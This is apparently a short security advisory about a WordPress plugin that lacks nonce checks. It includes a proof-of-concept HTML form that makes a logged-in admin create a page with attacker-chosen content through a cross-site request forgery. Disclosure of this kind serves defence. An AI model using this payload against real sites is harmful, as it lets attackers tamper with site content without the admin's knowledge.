The plugin does not implement nonce checks, which could allow attackers to make a logged in admin create new page and change it’s content via a CSRF attack.
<html>
<body>
<form action="https://example.com/wp-admin/admin.php" method="POST">
<input type="hidden" name="eeShortcode" value="Page Content" />
<input type="hidden" name="eeCreatePostType" value="Page" />
<input type="hidden" name="eeGo" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>